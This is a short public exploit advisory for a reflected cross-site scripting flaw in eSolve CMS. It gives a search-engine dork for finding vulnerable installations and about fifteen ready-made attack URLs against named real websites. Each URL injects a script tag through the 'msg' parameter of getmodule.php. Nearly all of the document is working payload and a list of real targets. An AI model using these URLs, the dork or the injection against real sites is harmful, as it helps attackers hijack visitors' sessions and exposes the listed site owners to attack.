###################### # Exploit Title : eSolve CMS Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.esolve.co.za/ # Google Dork : "Powered by eSolve" inurl:"getmodule.php?id=" # Date: 04 Feb. 2016 # Tested On :Windows 7 /FireFox ###################### #demos and explanations: #http://www.wpna.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.neovision.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.canecutterguesthouse.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.umtapocentre.org.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.safepro.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.safariandoutdoor.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.skoonskin.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.wurmbosch.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://gatewayhealth.esolve.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.gymstore.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.oniccah.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.beadshop.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.seronictours.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.beadshop.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> #http://www.babyhouse.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script> ###################### # discovered by : Amir.ght ######################